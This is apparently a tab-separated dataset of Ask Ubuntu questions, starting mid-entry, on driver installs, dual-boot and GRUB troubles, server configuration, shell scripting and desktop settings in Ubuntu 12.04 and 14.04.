apt-get install nvidia-313 and it did not work and i got a message package 'nvidia-313 ' has no installation candidate . so i followed instructions here to install nvidia drivers and when i ran cudahashcat it started but i got another error saying error : no nvidia compatible platform found . oh yeah , by the way , when i rebooted my laptop after installing my drivers during my latest installation attempt , my laptop is n't loading unity ( again ) . i give up . my questions : how do i install graphics card drivers for my gt 555 series ) ? and how do i get rid of the error : no nvidia compatible platform found message so that i can properly run cudahashcat ?
503158	is there a project page for the upcoming ubuntu icons ?	according to this site : http : //design.canonical.com/2013/12/the-new-ubuntu-icons/ there are a menagerie of new icons in the works for ubuntu . if i would like to contribute to this , where would i find the project page ?
503161	trouble with finding windows install	i have 2 hard drives . first one has windows installed on it . i installed ubuntu on my second hard drive today . every time i boot it goes to ubuntu . ubuntu is working fine . grub does n't show my windows install . when i select my hard drive with windows on it as primary boot it says to install working boot device . i know my windows install is there , i see it within ubuntu menu . any ideas on how i can find my windows install so i can add it to grub ? i am just starting out using ubuntu , so i apologize for my ignorance . i tried running boot repair , but that did n't do anything . tried searching forums and google , but have n't had any success . thank you for everyone 's help ! http : //paste.ubuntu.com/7870556/
503162	where does nautilus store its bookmarks ?	in my ubuntu , i have added some frequented directories to the bookmarks of nautilus , for visiting them quicker . i am looking for where the dir bookmarks of nautilus are stored , but to no avail : $ find ~ -name nautilus | less ./.config/nautilus ./.gconf/apps/nautilus ./.gconf/apps/ubuntuone/nautilus ./.gnome2/accels/nautilus $ find ~ -name bookmarks | less ./.streamtuner/cache/bookmarks ./.config/zathura/bookmarks ./.elinks/bookmarks i checked the above locations , and content of the files there , but did n't find anything for bookmarks . is it possible to convert the dir bookmarks in nautilus to links ? it seems like dirs ca n't have hard links , but i prefer the links can still work after changing the dirs ' name . thanks .
503164	installing on a desktop with 2 hd 's . i want to install on the empty 500 g hd . how do i do it ?	the windows 7 desktop has a 1.5 t hd and an empty 500 g hd . i am trying to install on the 500 g hd . i got an install error that there is no bootstrap installed . it does look like ubuntu is on the hd but not functional
503168	minor problems with using an asus z97-a motherboard	i recently got a new asus z97-a motherboard which came with an intel core i5 processor and a new hdd . i installed ubuntu 14.04.1 lts to the hdd . i was recently playing with the motherboard settings , which included disabling secure boot , enabling fast boot mode , and running asus optimal tuning . but after doing all of that , ubuntu failed to start . sometimes i was stuck looking at the ubuntu splash screen , sometimes i was looking at a blank screen , and sometimes my monitor would turn off saying that there was no video signal . i discovered later that restoring my motherboard to factory settings ( excluding secure boot ) made ubuntu work again . is there any way for me to take advantage of using all of the goodies this motherboard has to offer without it breaking my system ?
503171	how to remove windows bootoption that results in 'wubildr.mbr'/0xc000007b error message ?	at one point i tried to install ubuntu onto my hard drive without a usb or a cd . it is a windows 8 computer . it did n't work , so i eventually gave up and did it with a usb . ubuntu works fine now , but whenever i try to boot into windows , asks me if i want to boot into windows or unetbootin . when i click unetbootin , it gives me an error message : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do not have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc000007b info : the application or operating system could n't be loaded because a required file is missing or contains error . how do i get rid of the unetbootin/wubi option entirely ?
503172	xfce title less maximized windows	i 'm looking at something like this bug report https : //bugs.launchpad.net/ubuntu/+source/xfwm4/+bug/1301873 . arch seems to have to have it packaged at https : //aur.archlinux.org/packages/xfwm4-titleless-dev/ . is there some ppa or instrutions to have that behavior in xubuntu 14.04 ?
503174	continuous low-graphics mode on reboot after installing nvidia-331 driver	i 'm running ubuntu 14.04.1 lts . after installing nvidia-331 driver , my machine continues to go to the low-graphics mode troubleshooting . the weird thing is that if i choose a recovery mode on boot and just select `` resume '' , the system goes to the normal login screen successfully . after then , the problem continues if i did n't choose the recovery mode on boot . well.. i installed the latest propriety driver from nvidia ( 340.24 version ) , and that driver solved this issue but i can not use that version because some parts of ui randomly flicks : https : //bugs.launchpad.net/compiz/+bug/1288747 since the system boots correctly on recovery mode , it looks like there is a solution . but i just do n't know how ...
503176	ca n't install ubuntu 14.04 with wubi because of permission issues	i am running windows 8.1 32-bit ( but my pc can run 64-bit also ) and whenever i try to install ubuntu 14.04 64-bit with wubi on my new 19gb partition , soon as it gets to the end it says '' an error occurred : '' '' permission denied . '' and then it says check the log file in the appdata folder ( which i checked ) . i 've previously installed ubuntu on the same system but i thought something was wrong because it kept going to a terminal and i thought the gui did n't install so i uninstalled to try again but it got the error above . what do i do ?
503177	uninstalled plymouth splash changer . now i have no splash	i installed plymouth hoping it would change my boot splash , which it did with the default splash , but i could n't change it so i uninstalled it but now i have no splash when i boot or power off my macbook air . how can i fix this ? thank you !
503178	is there a diff . or inc. backup with universal viewability	is there such a thing as a differential or incremental backup where you do n't need a specific program - just a file browser - to view ( the most recent/the least recent/any version of ) backed-up files ? also , is there any list of backup software/methods online where each entry says whether it saves the backup in a way that it can be easily viewed in a file browser ? ( or how specifically it saves the backup )
503181	does nvidia-prime do automatic switching in 14.04 ?	i was using bumblebee for a while and have no moved to nvidia-prime . i noticed that i can change the gpu that i am using through the nvidia settings gui . my question is , however , is if nvidia-prime is doing any automatic switching in 14.04 ? if so , how can i tell ? if not , any idea on when something can be expected ? lastly , and maybe should be in another question , but is it still possible to run a single app in the nvidia card ?
503182	how to stop numlock toggling	is there any way to stop numlock toggling keypad in kde ? i want to use numlock as a hotkey and toggle keypad with another key or with an application .
503188	hi , i ran into a booting problem	so i wanted to dual boot windows 8.1 and ubuntu . i followed this tutorial : https : //www.youtube.com/watch ? v=pk7gwikay7s the problem i got was , after i restarted pc when prompted by ubuntu installer . i of course loaded into grub , but windows 8 isnât there only ubuntu . ( on ubuntu now ) this is my pc : http : //www.pcworld.com/product/1179403/alienware-x51-mini-system-desktop.html i have my windows 8 disk , but i need to know what went wrong and how to fix it and make it so i can choose to boot windows 8 or ubuntu . when i got to ubuntu home i see my windows 8 partition as device . thx you for your time .
503193	how to install an lg modem ?	after calling the wvdial this is the answer i get : -- > wvdial : internet dialer version 1.61 -- > can not get information for serial port . -- > initializing modem . -- > sending : at -- > sending : atq0 -- > re-sending : at -- > modem not responding .
503195	can i safely remove ubuntu-desktop ?	a couple months ago i switched to ubuntu ( saucy ) then upgraded to trusty tahr . a couple days ago i learned that i can install other -buntu 's and boot from them . since then i 've installed gnome and a steam package that boots directly to big picture mode ( the speeds are incredible ) . i decided that i liked gnome a lot more than i did unity , and i 'm wondering if it 's safe to remove that package and purge it .
503196	how to create partition after ubuntu installed	i bought my laptop online with ubuntu os pre-installed and with default partitions . problem : how to change the partition size or create a new one ? here is an image showing my current partitions
503199	facebook and codechef pictures not showing up in when i use ubuntu	i have a problem of facebook profile pictures not showing up in my current wifi network . it works fine in other networks . should any network settings be changed ?
503200	what kernel should be used with ubuntu 12.04	i have 2 computers with intel i5 cpu 's , both of which are running ubuntu 12.04.4lts . however , one has kernel version 3.2.0-67 and the other has kernel version 3.13.0-32 . both have all the latest updates according to the update manager . why are the kernel versions so different and which one should be used with this version of ubuntu .
503201	how to search official ppa ?	how can i search official ppa ? some applications in ubuntu does n't update for last version for long time . for example virtualbox , gcc , git . i am afraid to use ppa which can be unofficial and i can not find ppa on official sites .
503202	formatting usb thumb drives for ubuntu in windows	i am having issues getting usb drives to work correctly in ubuntu and have read various bug reports of certain formats not working correctly in ubuntu . if i want to format a usb drive from inside windows for maximum capability with ubuntu , what format type and program should be used ? note : this pertains to usb drives as portable storage devices and not anything to do with making bootable media .
503203	plugin layer alternatives to compiz 's plugin layer	compiz 's widget layer is buggy with unity global menus , and limited to one layer . alternatives are needed . an alternative can be either : an actual widget layer application . a unique solution that achieves the same goal . a limited solution that caters to a specific application . an example of a limited solution , would be guake , which is situated on its own layer , and hides/reveals itself to a settable trigger , default `` f12 '' . a solution will be chosen in accordance to : ease of setup stability whether it allows me to have individual triggers for individual applications . i prefer having a single application to a single layer ; compiz does not allow that , as it only has one layer .
503205	adding plugin check_hping to nagios	i need to checking ip : port by ping , so i find out check_hping plugin to nagios . i 'm trying to add it to the nagios core 4. http : //exchange.nagios.org/directory/plugins/network-protocols/icmp/chech_hping/details in the nagios service web interface i got the error : critical : error pinging 1 , it seems that i have correctly added plugin to the plugin folder ( permissions , ownership.. ) root @ onedata-desktop : ~ # ls -l /usr/local/nagios/libexec/check_hping -rwxr-xr-x 1 nagios nagios 1994 jul 26 17:36 /usr/local/nagios/libexec/check_hping 2 , all arguments in command are correct : define command { command_name check-ping-on-port command_line $ user1 $ /check_hping $ hostaddress $ $ arg1 $ $ arg2 $ $ arg3 $ } define service { use generic-service host_name cam_chodba service_description kamery check_command check-ping-on-port ! 100 ! 300 ! 10201 normal_check_interval 1 retry_check_interval 1 } 3 , nagios user 's permissions : root @ onedata-desktop : ~ # cat /etc/group | grep nagios nagios : x:1001 : nagios , www-data 4 , the command is executable from command line : onedata @ onedata-desktop : ~ $ /usr/local/nagios/libexec/check_hping 188.123.99.171 200 300 1201 [ sudo ] password for onedata : ok : average response time 20 ms ; packet loss 0 % maybe you can help me . thank you
503206	how do you install the ubuntu touch coreapps ?	how do you install the ubuntu touch coreapps on an ubuntu desktop ?
503211	getting a command to run on all files in subdirectories	apologies for the n00b question . i 've installed plex media server on ubuntu 14.04 , and it seemed to be ignoring some folders and files . a very helpful person over at the plex forums suggested i needed to ensure plex had the proper permissions to read and access the files , and shared with me the following commands : cd /directory-containing-media sudo find . -type d -print -exec chmod 755 { } \ ; sudo find . -type f -print -exec chmod 644 { } \ ; it 's working well , but i have a lot of sub-folders/subdirectories and it 's very time consuming to run in every separate folder . what 's the best way to get it to run against all files in all sub-folders ? i 'm guessing it 's to use '-r ' , but i 'm not sure where to put it or if i need any other options etc .
503212	ubuntu qmake is not an executable	i have the latest versions of qtcreator , qt5-qmake build-essential and g++ installed . in option of build & run and choose qmake in /usr/bin/qmake i get this error : the qmake executable /usr/lib/i386-linux-gnu/qt4/bin/qmake could not be added : qmake '/usr/lib/i386-linux-gnu/qt4/bin/qmake ' is not an executable . in home system i do n't have any problem after installing those packages and setting qmake in option other information : tux-world @ alachiq : ~ > apt-cache search qt5-qmake qt5-qmake - qt 5 qmake makefile generator tool tux-world @ alachiq : ~ > ldd /opt/qtforarm/bin/qmake ldd : /opt/qtforarm/bin/qmake : no such file or directory tux-world @ alachiq : ~ > sudo chmod +x /usr/lib/i386-linux-gnu/qt4/bin/qmake [ sudo ] password for tux-world : chmod : can not access â/usr/lib/i386-linux-gnu/qt4/bin/qmakeâ : no such file or directory
503213	ssh locale setting	i use ssh to connect remote pc . when i 've connected i have wrong locale configuration . and every time i have to execute command : export lang=en_us.utf-8 my local and remote user locale already set to lang=en_us.utf-8 but remote global locale is other . what settings have i to fix ( at local or remote pc ) to get correct locale when connected over ssh ?
503216	how can i set a single .bashrc file for several users ?	during my work i need to constantly add alias commands to bashrc , most of those commands needs to be runed by other users . is there any way i could add alias commands to a bashrc from external source ?
503217	how to reduce lcd brightness if intel_brightness is unistalled ?	tried echo , xrandr and even xbacklight could n't reduce backlight of my screen . can anyone suggest any other way ?
503221	how do i decrypt bitlocker-encrypted external hard drive on ubuntu 14.04 ?	i have a 1tb transcend external hard drive , which is already encrypted with bitlocker ( windows feature for encrypting drives ) , i removed my windows os and now using ubuntu 14.04 but unfortunately could n't access my external hard drive on ubuntu 14.04 , if anyone knows the solution please help me . regards
503230	return value from awk	this is mybashfile.sh file . . . awk -f myawkfile.awk mytracefile.tr . . . now i want to return one parameter from myawkfile.awk to the current mybashfile.sh . is there any way to return a value from awk to the bash . for example : this sudo code : parameter = awk -f myawkfile.awk mytracefile.tr in here parameter is the value , which i calulted that on the awk . but now i want to pass that tp the curreny bash .
503231	can not ssh via inadyn and freedns	i am having trouble getting ssh to work with a dynamic ip address . i have two laptops , one host and one guest . i have ssh set up on the host and i can ssh in from the guest as long as i know the current ip address i set up inadyn to a freedns account and that seems to be running on my host without problems . ps -a |grep inadyn 4179 ? 00:00:00 inadyn jul 27 00:24:00 xxxxxxx inadyn [ 4179 ] : i : inadyn : alias 'notactuallymyaccount.mooo.com ' to > ip '107.xxx.xx.xx ' updated successful . ping suggests the address is working also . however when i try to ssh from the other computer ssh notmyusername @ notactualymyaccount.mooo.com i get ssh : connect to host notacctuallymyaccount.mooo.com port 22 : connection refused any suggestons as to why this is n't working ?
503233	installing ubuntu 14.04 over 12.04	does the installation of ubuntu 14.04 recognise that there is already a version of ubuntu installed on the computer ?
503236	problem lauching eclipse juna from unity toolbar 14.04	the only way to launch it is through the file itself , when eclipse is in the toolbar it shows as a black program and does not run .
503238	disabling the left-aligned lock screen in ubuntu 14.04	in 14.04 , there appear two be two types of lock screens . the left-aligned one , which you also get when you first boot the machine . the centre-aligned one , which you get when you press ctrl+alt+l after a certain time out , the centre-aligned one reverts to the left-aligned one . when i am in the left-aligned one , i run into a problem which i have described in a previous question , `` ubuntu 14.04 lock screen freezes '' ; but i do not encounter this problem at all with the centre-aligned lock screen . one workaround to my problem could be to disable the lock screen that causes this problem , and only have the other one . how would i go about doing this ?
503242	ubuntu wifi does not connect where windows connets	i am using ubuntu 14.04 on laptop . i am able to connect to wifi near router . at some more distance from router the windows connects to wifi but ubuntu most of the time does not . i have tried wicd and networkmanager but issue remains . in the rare case that ubuntu connects to router from distance , i observe more ssids in menu . otherwise it does not show other ssids in menu . please advise how to correct range of wifi in ubuntu . edit : the wireless-info is at http : //pastebin.ubuntu.com/7873693/ thanks .
503244	how to bring `` .bashrc '' in effect without logging out or restarting the current session ?	i am basically using .bashrc for adding environment variables . each time i add a new environment variable , i have to log out the current session and log in again to bring the changes in effect . is there any way where i can add environment variable and continue working without restarting the session ? [ i think i am clear with my question . if more information is needed , please let me know ] any help is highly appreciated . : ) ( ubuntu 14.04 - 32-bit )
503248	no more icons on my desktop	ubuntu 14.04 . i have 2 user accounts . this problems appears only for one of it . i have no more icons on my desktop , neither the launcher , just the desktop picture . right click still works , so i can access system settings . when using gnome , everything works perfect .
503252	after deleting ubuntu partition , system is not booting from cdrom or usb either . need urgent help !	when i deleted ubuntu partition from my system using windows disk management and restarted the system it shows an error screen : error : no such partition . entering rescue grub mode ... grub rescue > is there anything that i can do ? please help i shall be thankful .
503253	problem with dvd+r in ubuntu 14.04	so i was trying to move my music collection ( .mp3 ) from my windows 8 to ubuntu.so i took a dvd+r disk put into windows worked fine , put my music on it.then when i put it in ubuntu my tray spins , but ubuntu doesnât see it . i duel boot windows and ubuntu .
503256	problem setting up thunderbird on 14.04.1 install	i just installed ubuntu 14.04.1 and am trying to set up thunderbird ( 31.0 ) . i follow the usual setup ( i have done this many times in the last few months on 12.04 and on another machine with 14.04 ) and use an existing email address , it finds the correct ports/connection security and then the status line says `` mail for : sending login information ... '' . if i click on inbox it just hangs indefinitely . ( my other machines use thunderbird to access my imap account with no issues . ) there is no firewall issue . tcpdump on the server & client machines shows traffic on imap/imap2 . in fact the traffic just keeps on going & going & going until i kill thunderbird . any suggestions appreciated . i am stuck with squirrelmail on my machine for the moment ! update : i downloaded an older version from http : //ftp.mozilla.org/pub/mozilla.org/thunderbird/releases/24.7.0/linux-x86_64/en-us/ and bunzip2 & untarred the file , then ran ./thunderbird/thunderbird . this worked as expected ( but is not integrated into the standard ubuntu window manager setup ) . in addition , i removed my .thunderbird directory and was able to create a new account without any issues . if i start the 31.0 thunderbird it just shows the busy icon with the status message `` looking for folders '' . more info : when trying to connect using either thunderbird 31.0 or 24.7 this morning i got the 'too many connections ' every time , so was unable to check mail . after some slog , i discovered that the imap server had many messages of the form : jul 28 10:35:10 crow xinetd [ 2126 ] : fail : imap per_source_limit from= : :ffff:192.168.0.8 restarting xinetd fixed the problem . however , since this is the first time i have ever encountered this limit with xinetd , i suspect it may be related to the problems at hand .
503258	ubuntu 14.04 running extremely slow !	i have installed ubuntu 14.04 on my 8 pc 's . those running on pentium processors are fine but not as stable as they should . windows 7 used to run extremely smooth on them . app executes slow , and sometime the system gets absolutely non responsive ! while i had two systems with 512 mb of ram and intel celeron processors , they used to run on windows 7 , and their performance was okey but as soon as i installed ubuntu 14.04 they are not responding . it takes 5 or more seconds to type a letter , , a minute to open a app . they boot normally but as soon as i login , they respond like a hell ! pls help me out for both errors . i have tried intel graphics driver installer and many tweaks but could not help ! is there any issue with the ubuntu image selection or what ? ? its ubuntu 14.04.1 32 bit iso !
503261	install ubuntu on second ssd on asus eeepc 901	i have an asus eeepc 901 which previously had windows xp installed - i 'd like to replace this with ubuntu 14.04 now that xp is out of support . the eeepc model that i have has two ssd drives - one 4gb and one 8gb . when i get go to install ubuntu , it shows the 4gb drive as the first drive . it shows the following devices : /dev/sda 4034 mb /dev/sdb 8069 mb i 've tried installing ubuntu on the 4gb drive with the 8gb drive for /home and swap . but although it ran , it was crippled by lack of disk space . i thought about installing /root on the 8gb drive , but i get a message saying that the partition can not be outside the disk . my question is , what would people recommend as options for installing ubuntu on this configuration ? and how do i do it using the graphical installer ? i have no knowledge of linux installations , so please keep it simple for me . i just want a easy-to-use os for my netbook computer to give it a few more years life . if you 're not familiar with the eeepc 901 , the specs for it are here : http : //en.m.wikipedia.org/wiki/asus_eee_pc dom
503264	how do i enable/disable guest account in trusty 14.04.1	only my user is shown on greeter , guest is not , my wife is not . this is a system i reinstalled from 12.04-i386 to 14.04-amd64 , reformating all but /home . even a user created from trusty wo n't show on greeter . the only way these 3 can log in is from my own system menu switch user feature . i dug a bit and discovered i have the ~new ? ~ accountservice thing installed , so that all tricks i found around about lightdm are now out of scope . ( please change the text about unity-greeter tag saying lightdm is underlying )
503266	can not install packages in lubuntu 12.04	i 've just installed lubuntu 12.04 on an acer aspire one netbook . i 've noticed that although chromium-browser is installed , it does n't come with a flash-player . i tried to install it using sudo apt-get install flashplugin-installer but i get the error e : unable to locate package flashplugin-installer i also tried to install some other basic packages like gedit , deluge , kate , geany but i get the same error . then i tried to update all repositories using sudo apt-get update & & sudo apt-get upgrade but while it 's running there are some errors like err http : //gr.archive.ubuntu.com quantal-updates/main sources 404 not found or w : failed to fetch http : //gr.archive.ubuntu.com/ubuntu/dists/quantal/restricted/source/sources 404 not found why is this happening ? i 've checked my internet connection and it 's fine . i also tried to install chrome using gdebi package installer` but i get an error dependency is not satisfiable : libnns3 ( > =3.14.3 ) i believe that somehow i can not see the repositories . what can i do to fix this ?
503267	change skype tray icon	skype version 4.2 comes with a low res 48x48 statusbar/tray icon . how can i change the icon to a higher resolution icon ?
503270	problem with project r installation	i do n't know where to put this line in the file . or is there the possibility to achieve it over the shell somehow ? i 'm using 14.04 . installation to obtain the latest r packages , add an entry like deb http : // < my.favorite.cran.mirror > /bin/linux/ubuntu trusty/ or deb http : // < my.favorite.cran.mirror > /bin/linux/ubuntu precise/ or deb http : // < my.favorite.cran.mirror > /bin/linux/ubuntu lucid/ in your /etc/apt/sources.list file , replacing < my.favorite.cran.mirror > by the actual url of your favorite cran mirror . see http : //cran.r-project.org/mirrors.html for the list of cran mirrors . to install the complete r system , use sudo apt-get update sudo apt-get install r-base my mirror would be : http : //stat.ethz.ch/cran/
503272	bad overall video quality xubuntu 14.04	i have a problem with videos in xubuntu : they suck . i have tried both open and closed source drivers , no difference what-so-ever . by open i mean that i went on settings > additional drivers and selected the xorg-open one ( the default ) . then i selected the second ( closed-source ) `` flgrx '' , but no difference . videos play just fine ( i tried every player , parole , vlc , mplayer ... you name it ) , they only have little horizontal pixel misalignment ( it 's like when you take a picture , cut it in 2 half , then you try to recompose the picture but you do n't align it perfectly , so maybe is 5 % on the right from the center , or 5 % from the left of the center ) . how can i have smooth video playback ? my video card : 1024mb ati amd radeon hd 6800 series ( sapphire/pcpartner )
503274	i want to disable usb storage but usb mouse keyboard and datacard should work in any version of ubuntu	i want to disable usb storage but usb mouse keyboard and datacard should work in any version of ubuntu like ubuntu 12.04 or ubuntu 13.10 thanks & regards rohit
503277	boot up , freeze up	i am trying to boot lubuntu on an old xp box from a cd . i choose the lubuntu option at start up . it boots but then does not function . i have used the escape key to enter into the start up options and have tried all four options with no success . it seems to unpackage , but then it just hangs up with a load of packages items where they all say `` ok '' any ideas ?
503279	printer supporting ubuntu 14.04 lts	scope : ubuntu 14.04 lts 32bit , installed from dvd ( onto an old shuttle computer ) hello , i am looking for an ink or laser home printer , working without problems for ubuntu 14.04 . my search for a list of preferred ubuntu 14.04 lts printers actually did not succeed . can anyone tell me by his/her experience which printer worked fine for ubuntu 14.04 lts ? that would be a great help . thanks in advance . ortwin
503282	loud speaker problem with dell inspiron 3521 for ubuntu only	how can i get output sound for ubuntu 10.04 and 12.04 with dell inspiron 3521 ?
503284	how to configure gwibber for twitter	i have been trying to configure gwibber for broadcast accounts of facebook and twitter . however , after selecting add account , nothing happens . you can see the image below beyond which there is no response . since there is no place to enter account details , pressing authorize does nothing . any help would be appreciated .
503287	how to install driver for usb wireless id 2001:3310 rev d1 on lubuntu 14.04 ?	i have tried 3 methods but unsuccessful . the method ( 1 ) asked for username and password of git website , which i did n't know . the method ( 2 ) led to 404 error not found . in the method ( 3 ) , i extracted the zip file and saw several folders including `` core '' , `` hal '' , `` os_dep '' , etc. , which i did n't know how to install # 1 sudo apt-get install git git clone https : //github.com/purchae/rtl8188eu.git # 2 wget http : //ftp.at.debian.org/debian-backports//pool/non-free/f/firmware-nonfree/firmware-realtek_0.27~bpo50+1_all.deb # 3 download rtl8192se driver for linux from the website of realtek
503291	can not setup ubuntu 14.04 server via pppoeconf	i am trying to install ubuntu 12.04 on my machine . currently my internet connection uses pppoe . normally on ubuntu desktop , i can run pppoeconf to enable pppoe . since ubuntu 14.04 server setup requires active internet connection while setup , i ca n't connect to pppoe on the setup . any idea how can i setup ubuntu 14.04 in my condition ?
503292	can not boot after fresh install of 14.04	i have an ssd hard drive with no other os installed . i have msi p67a-gd65 mb , msi gtx570 nvidia graphics card . i freshly installed ubuntu 14.04 from the live cd . after reboot , it shows me a blank screen with a blinking cursor . solutions i have tried : i can not get to grub menu by holding the right shift . i pressed a key to go the menu when booting using the live cd , i tried the f6 , nomodeset randomly with other options then boot to hd but with no luck . i have very little experience with ubuntu and linux .
503293	unusable space when creating ubuntu partitions	i 'm installing ubuntu with a usb stick in a windows machine . when creating partitions i can only create / partition and /swap partition . i 'm unable create the /home partition from rest free space as it displays as unusable . i know that similar questions have been asked . however as i can see there 's only one primary partition and others are logical . can you please help me to proceed with ubuntu installation as i fairly new to those things . /dev/sda free space 105mb /dev/sda1 ntfs 41838 windows /dev/sda5 ntfs 41943 /dev/sda6 ntfs 52427 /dev/sda7 ntfs 61311 /dev/sda3 ext4 / 14999mb /dev/sda4 swap 4000mb unusable 33429
503294	x org rollback version and solving problems ( hardware acceleration )	this question goes with my previous question : google chrome crashes in 14.04 regarding google chrome crashing x. i believe x.org was recently updated on my xubuntu 14.04 trusty . until recently i could use hardware acceleration in google-chrome and webgl on my ati / radeon hd8600m . but now it is not working anymore and when i try to use google-chrome the whole x crashes . how can i roll back to an older version of x.org ? or how can i try and solve this x.org error ? thanks .
503295	fn shorcut keys	ok the problem is that the fn + keys were working perfectly , but i accidentally changed the `` volume up '' to f10 without the fn key ( in the system settings , keyboard , shortcuts ) but then i changed it back to fn+f10 and the shortcut does n't work anymore . later i have noticed that every shortcut that i have manually changed to fn + key doesnt work ( the shortcut was the same before i changed it ) ; however , if i changed the shortcut to any key without fn then it works perfectly . so how do i make fn + keys work again ? ? ? ?
503296	problems to run lexmark x2600 printer installation file on ubuntu 14.04	i 'm using ubuntu 14.04 ( 32 bit ) and want to install my lexmark x2620 printer . i found and downloaded the file lexmark-inkjet-08-driver-1.0-1.i386.deb.sh if i run it in a terminal , it starts with : verifying archive integrity ... all good . uncompressing nixstaller ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... collecting info for this system ... operating system : linux cpu arch : x86 ( gtk:2488 ) : ibus-warning ** : the owner of /home/vio/.config/ibus/bus is not root ! tracking ident = 14052009 cpu speed = 1000 mhz ram size = 2014,45703125 mb hd avail = 44948 mb then the lexmark installation window is popping up and tries to install the printer , stopping after a few seconds giving out that : extracting file : lexmark-inkjet-08-driver-1.0-1.i386.deb extracting file : launcher.c extracting file : lsbrowser extracting file : lsusbdevice extracting file : lxklpia.sh extracting file : jre1.6.0_07.bin extracting file : launcher using dpkg installation ============================= execute : dpkg -i lexmark-inkjet-08-driver-1.0-1.i386.deb > /tmp/selfgz7354/pkg/files/dpkg_msgs dpkg : fehler beim bearbeiten des archivs lexmark-inkjet-08-driver-1.0-1.i386.deb ( -- install ) : parsen der datei »/var/lib/dpkg/tmp.ci/control« , nahe zeile 9 paket »lexmark-inkjet-08-driver« : leerzeile im wert des feldnamen »description« can someone please help me to get this printer run ? thanks , ralf
503297	nano - insert content , save and exit	i 'm currently working on making a text file of the whole process of setting up my server for my normal usage . and would like to know if there is any way to write a shell script so that i can make the `` nano '' insert content , save it , exit it , and then continue with the rest of my commands . cause when i put all of this into the shell script : sudo nano /etc/apache2/conf-available/fqdn.conf servername localhost sudo a2enconf fqdn then it shows the `` nano '' file editor with this content : servername localhost sudo a2enconf fqdn well , while i wanted it to save and exit after the servername localhost , so that my script could continue . would that be posibble anyhow ?
503300	problem running the script in .sh file	i want to execute below script rm -rf /home/apps/temp export daa_home=/home/apps/tools/3.6/eclipse export buildfile=/home/apps/tools/automated/buildfile alias studio_home= $ daa_home rm -f studio_home/build.xml cp $ buildfile/build.xml studio_home cd studio_home ant -f build.xml and i 'm getting following errors : cp : can not stat ‘/home/apps/tools/automated/buildfile\r/build.xml’ : no such file or directory : no such file or directoryudio_home can anyone please help ? ? thanks , ranjeet
503301	apt returning 404 error on apt-get install	i am getting the below error when trying to test a new repo failed to fetch http : //myrepo.blah.com/repo1//data1/repos/lucid/repo/some_package.deb 404 not found . my sources.list file contains entry is as follows deb http : //myrepo.blah.com/repo1 lucid/ repo1 is a symlink to /data1/repos also my repo directory structure is as follows : debs = > /data1/repos/lucid/repo release files = > /data1/repos/lucid/dists/lucid/release and release.gpg package and packages.gz in /data1/repos/lucid
503304	misaligned titlebar icons in google chrome	i had installed pantheon desktop on my ubuntu gnome 14.04 using the elementary os ppas . however , that messes up with the title bar in google chrome , as the snapshot shows . the problem persists even after removing pantheon , uninstalling/reinstalling chrome . it would hep if we could fix the issue with the misaligned icons in chrome .
503306	postfix/dovecot issue	i installed postfix/dovecot locally on ubuntu server , i can mail from ubuntu server to any user in my local users database ( /etc/passwd ) and i can receive messages well ( by using mail command ) . on mua ( thunderbird , outlook , evolution ) i can only send messages without receive any message , i only receive messages by typing mail command on the server . i check the /var/log/maillog but i found no errors . i 'm also able to telnet from client to server using pop3 and imap ports . what i should do ? here 's /etc/postfix/main.cf file : http : //paste.ubuntu.com/7874899/ here 's /etc/dovecot/dovecot.conf : http : //paste.ubuntu.com/7874936/ here 's /etc/dovecot/conf.d/10-master.conf : http : //paste.ubuntu.com/7874943/ here 's /etc/dovecot/conf.d/10-mail.conf : http : //paste.ubuntu.com/7874952/ here 's /etc/dovecot/conf.d/10-auth.conf : http : //paste.ubuntu.com/7874960/
503316	again ubuntu 14.04 runs fine in test mode but will not boot after install is completed	this question was posted by another user a month ago but has received no answers so i 'm no holding out much hope . i 'm new to linux after becoming disenchanted with windows so my skill level is minimal . i installed 14.04 onto my old laptop replacing windows 7 and that worked fine . impressed with the changes i decided to replace windows 8.1 on my new laptop . i repeated the installation process and everything worked fine until i was told to reboot to complete . when the laptop restarts it reports : checking media presence ... ... no media present ... ... and then reboot and select proper boot device or insert boot media in selected boot device and press a key it will not action anything on a dvd but will work of a usb but i 'm back to the beginning with trying or installing ubuntu . i 've installed several times now , both straight from booting via the usb and from running try ubuntu without installing and then installing it whilst from the desktop . both methods take me through the whole installation process but leave me with nothing on the reboot to complete . my laptop is a toshiba satellite c55-a-1uc 15.6-inch laptop with intel core i3-4000m 2.4 ghz , 8 gb ram , 1 tb hdd thanks for taking the time to read . i hope you can help me to resolve this .
503317	desktop icons properties in xubuntu xfce ?	specifically how to set icon opacity ? system `` folders '' like home are barely visible with any desktop background . i 'd fix it if i knew where to go .
503318	how to disable top bar in unity ?	is it possible to get rid of the top bar in unity ? it wastes screen space without any useful features in exchange . i would like to move `` systray '' area ( where the date , power , sounds and gear menu resides ) to the left panel , just below the application icons . then , disable the top menu . how to achieve such setup ? of course in such setup , applications ' window menu must return from top bar to its parent window .
503325	no unity ( desktop/sidebar ) after uninstalling bluez	had some problems with bluetooth earlier so i wanted to reinstall the bluetooth component . i used apt-get remove/install bluez . it looked like it uninstalled a lot of stuff . ( uninstalling took a lot longer than installing bluez ) . after reboot i got to the login screen ( and my bluetooth-mouse working ! ) , but after login i see my desktop and icons but no unity/sidebar etc . i tried compizconfig as many suggested in similar help threads but i don even have the unity plugin showing in compiz so i cant reenable it . i also tried reinstalling ubuntu-desktop package as well as unity ( using apt-get ) but at no help . any ideas ? thanks in advance !
503326	unable to search 2g ( edge ) network	i am using huawei e1732 data card . in windows every thing is fine . now i am using ubuntu 14.04 lts . and i am not able to use any 2g network . please help me to solve this issue .
503328	i only get black wallpaper after upgrading to 14.04	i recently upgraded from 12.04 to 14.04 and after boot , my desktop will not display wallpaper . this is not a complete black screen - just the lack of wallpaper . everything else is working fine ( menu bars , app bar , cursor , etc . ) i have toyed around in the appearance menu with no success . any ideas ?
503329	libre office calc causes problems in recovering excel-files	installation : lubuntu 14.04 lts alongside win-xp problem : if i work/edit an ms-excel-file with libre office during the lubuntu-session and save this with the same file name and at its original location , then i have noticed , that this file does not open in win-xp . only excel opens , not the file ? to cure this , i selected system-restore to a date in the past and prior to the date of editing the excel-file > all ok ! ( but no more working the excel-fie with libre office ) question : does anyone know why this happens or what does setting libre office changes ? ricky
